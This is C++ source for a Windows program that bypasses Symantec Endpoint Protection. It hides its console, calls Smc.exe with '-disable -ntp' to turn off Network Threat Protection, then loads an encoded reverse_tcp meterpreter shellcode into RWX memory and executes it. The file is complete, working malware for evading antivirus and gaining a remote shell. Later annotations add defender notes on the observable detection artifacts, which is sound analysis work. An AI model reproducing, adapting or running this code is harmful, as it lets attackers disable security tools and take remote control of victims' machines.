- /******************************************************************************************
- * Author: @_dark_knight_
- * Description: Bypassing Symantec Endpoint Protection.
- * This creates a reverse_tcp meterpreter shell
- * and stops Network Threat Protection to allow communication out
- * to our attacking IP.
- *
 * Special Notes: Process enumeration code lifted from:
 * http://msdn.microsoft.com/en-us/library/windows/desktop/ms686701(v=vs.85).aspx
- *
- *********************************************************************************************/
- /*- Include files -*/
- #define _WIN32_WINNT 0x0500
- #include <iostream>
- #include <Windows.h>
- #include <tlhelp32.h>
- #include <tchar.h>
- #include <iostream>
- #include <WinBase.h>
- // Forward declarations:
- BOOL KillSymantec( );
/*- Entry point: hides the console, tries to disable Symantec Network Threat
 *  Protection (see KillSymantec), then executes the embedded payload in-process.
 *  No explicit return value.
 *  Defender notes: every step here is an observable artifact on its own — a console
 *  process hiding its own window at startup, a cmd.exe child launched against Smc.exe
 *  (inside KillSymantec), and an RWX allocation that is written to and immediately
 *  called. Any one of them is a reasonable hunting/detection pivot. -*/
int main()
{
    /*- Pointer to shellcode memory segment (stays NULL if VirtualAlloc fails) -*/
    LPVOID lpvResult;
    /*- Hide console window: the process keeps running with no visible UI -*/
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);
    /*- Disable Symantec Endpoint Protection's Network Threat Protection if Smc.exe is
     *  running. The BOOL result is ignored, so the payload below runs regardless of
     *  whether the client was found or the disable succeeded. -*/
    KillSymantec();
    /* [*] x86/alpha_mixed succeeded with size 641 (iteration=1) */
    /*- Encoded payload. The header comment says this is a reverse_tcp meterpreter
     *  stage; the line above is the encoder's own status message, which is presumably
     *  why the buffer is almost entirely printable bytes. The callback address is not
     *  visible here — assumed to be baked into the payload. sizeof buf counts the
     *  string literal's terminating NUL, so 642 bytes are allocated and copied. -*/
    char buf[] = "\x89\xe3\xdd\xc6\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
    "\x42\x75\x4a\x49\x59\x6c\x4d\x38\x6e\x69\x77\x70\x33\x30"
    "\x65\x50\x73\x50\x4e\x69\x58\x65\x50\x31\x6a\x72\x72\x44"
    "\x4c\x4b\x36\x32\x56\x50\x6e\x6b\x42\x72\x44\x4c\x4e\x6b"
    "\x61\x42\x55\x44\x6e\x6b\x44\x32\x71\x38\x34\x4f\x48\x37"
    "\x33\x7a\x35\x76\x50\x31\x4b\x4f\x34\x71\x6f\x30\x4c\x6c"
    "\x47\x4c\x45\x31\x51\x6c\x57\x72\x46\x4c\x77\x50\x4a\x61"
    "\x48\x4f\x74\x4d\x76\x61\x48\x47\x6d\x32\x48\x70\x30\x52"
    "\x72\x77\x4e\x6b\x31\x42\x72\x30\x6e\x6b\x30\x42\x75\x6c"
    "\x55\x51\x5a\x70\x6c\x4b\x63\x70\x64\x38\x4e\x65\x39\x50"
    "\x51\x64\x70\x4a\x45\x51\x6a\x70\x70\x50\x6c\x4b\x47\x38"
    "\x75\x48\x6e\x6b\x32\x78\x35\x70\x36\x61\x48\x53\x48\x63"
    "\x67\x4c\x70\x49\x4e\x6b\x46\x54\x6e\x6b\x56\x61\x4b\x66"
    "\x75\x61\x39\x6f\x35\x61\x79\x50\x4c\x6c\x6a\x61\x5a\x6f"
    "\x64\x4d\x46\x61\x6b\x77\x65\x68\x4b\x50\x51\x65\x4b\x44"
    "\x43\x33\x43\x4d\x58\x78\x47\x4b\x43\x4d\x35\x74\x61\x65"
    "\x4a\x42\x71\x48\x6c\x4b\x71\x48\x66\x44\x55\x51\x4b\x63"
    "\x53\x56\x4c\x4b\x44\x4c\x50\x4b\x6e\x6b\x31\x48\x57\x6c"
    "\x75\x51\x4b\x63\x4c\x4b\x46\x64\x4e\x6b\x77\x71\x58\x50"
    "\x4b\x39\x62\x64\x44\x64\x45\x74\x31\x4b\x71\x4b\x71\x71"
    "\x73\x69\x63\x6a\x70\x51\x79\x6f\x4b\x50\x32\x78\x51\x4f"
    "\x52\x7a\x6c\x4b\x54\x52\x5a\x4b\x6f\x76\x43\x6d\x32\x48"
    "\x57\x43\x50\x32\x63\x30\x77\x70\x52\x48\x34\x37\x44\x33"
    "\x65\x62\x53\x6f\x32\x74\x33\x58\x72\x6c\x44\x37\x74\x66"
    "\x66\x67\x59\x6f\x68\x55\x4e\x58\x6a\x30\x53\x31\x53\x30"
    "\x53\x30\x31\x39\x49\x54\x30\x54\x76\x30\x63\x58\x71\x39"
    "\x4b\x30\x52\x4b\x67\x70\x59\x6f\x6a\x75\x70\x50\x66\x30"
    "\x30\x50\x50\x50\x43\x70\x46\x30\x61\x50\x46\x30\x31\x78"
    "\x6a\x4a\x34\x4f\x39\x4f\x6d\x30\x69\x6f\x48\x55\x4d\x47"
    "\x53\x5a\x37\x75\x53\x58\x79\x50\x6e\x48\x63\x31\x45\x34"
    "\x75\x38\x34\x42\x55\x50\x66\x61\x6d\x6b\x6c\x49\x6a\x46"
    "\x63\x5a\x72\x30\x61\x46\x53\x67\x65\x38\x4f\x69\x59\x35"
    "\x30\x74\x70\x61\x59\x6f\x48\x55\x4b\x35\x69\x50\x31\x64"
    "\x36\x6c\x49\x6f\x70\x4e\x67\x78\x51\x65\x6a\x4c\x43\x58"
    "\x7a\x50\x4c\x75\x6f\x52\x72\x76\x49\x6f\x5a\x75\x53\x5a"
    "\x75\x50\x63\x5a\x66\x64\x62\x76\x50\x57\x31\x78\x36\x62"
    "\x48\x59\x48\x48\x53\x6f\x6b\x4f\x38\x55\x4e\x6b\x77\x46"
    "\x72\x4a\x61\x50\x65\x38\x65\x50\x32\x30\x57\x70\x63\x30"
    "\x46\x36\x50\x6a\x47\x70\x53\x58\x56\x38\x49\x34\x53\x63"
    "\x6b\x55\x39\x6f\x6a\x75\x4e\x73\x36\x33\x50\x6a\x73\x30"
    "\x76\x36\x33\x63\x31\x47\x42\x48\x45\x52\x69\x49\x69\x58"
    "\x33\x6f\x6b\x4f\x38\x55\x67\x71\x4f\x33\x65\x79\x4f\x36"
    "\x6b\x35\x49\x66\x43\x45\x7a\x4c\x4b\x73\x41\x41";
    /*- Allocate memory: one region that is both writable and executable (RWX).
     *  Defender note: PAGE_EXECUTE_READWRITE allocations requested from user code are
     *  a well-known detection signal because legitimate code rarely needs them. -*/
    lpvResult = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    /*- Copy shellcode to allocated memory and jump into it: the classic in-process
     *  self-injection sequence (allocate RWX -> write -> cast the buffer to a function
     *  pointer -> call). Control only returns here if the payload itself returns. -*/
    if (lpvResult != NULL ){
        RtlMoveMemory(lpvResult, buf, sizeof buf);
        ((void(*)())lpvResult)();
    }
    /*- Cleanup: reached only if the payload returned. If the allocation failed,
     *  lpvResult is NULL and this call simply fails; its result is not checked. -*/
    VirtualFree(lpvResult, 0, MEM_RELEASE);
}/*- End main -*/
/*- Enumerate processes to confirm the client is running Symantec Endpoint Protection.
 * Most of this code is lifted from MSDN.
 -*/
/*- Walk the process list looking for Smc.exe (the Symantec Endpoint Protection
 *  client, per the header comment); if found, shell out to it with "-disable -ntp"
 *  and wait 10 seconds.
 *  Returns FALSE only when the process snapshot could not be taken or read. TRUE
 *  means the enumeration completed — NOT that Smc.exe was found, and NOT that the
 *  disable worked (system()'s exit status is never examined).
 *  Defender notes: the observable sequence is a Toolhelp32 process snapshot, then a
 *  command-processor child (system()) whose command line contains
 *  "Smc.exe" -disable -ntp, then a 10 s sleep. NOTE(review): whether Smc.exe honours
 *  -disable depends on the client's configured policy — not visible from this code. -*/
BOOL KillSymantec( )
{
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;   // only dwSize is initialised here; the rest is filled by Process32First/Next
    // Take a snapshot of all processes in the system.
    hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
    if( hProcessSnap == INVALID_HANDLE_VALUE )
    {
        return( FALSE );
    }
    // Set the size of the structure before using it (Process32First requires it).
    pe32.dwSize = sizeof( PROCESSENTRY32 );
    // Retrieve information about the first process,
    // and exit if unsuccessful
    if( !Process32First( hProcessSnap, &pe32 ) )
    {
        CloseHandle( hProcessSnap ); // clean the snapshot object
        return( FALSE );
    }
    /* Now walk the snapshot of processes, and when we find our target process
     * disable the Network Threat Protection. Only the first match is acted on.
     */
    do
    {
        // szExeFile is the image file name without its directory.
        if (_tcscmp(pe32.szExeFile,_T("Smc.exe")) == 0) {
            /*- Disable Network Threat Protection via a hard-coded absolute path.
             *  system() runs this through the command processor, blocks until it
             *  exits, and its return value is discarded. -*/
            system("\"C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");
            /*- Wait 10 sec for things to settle (fixed delay, no status check) -*/
            Sleep(10000);
            break;
        }
    } while( Process32Next( hProcessSnap, &pe32 ) );
    CloseHandle( hProcessSnap );
    // TRUE here only signals that the walk finished, not that anything was found.
    return( TRUE );
}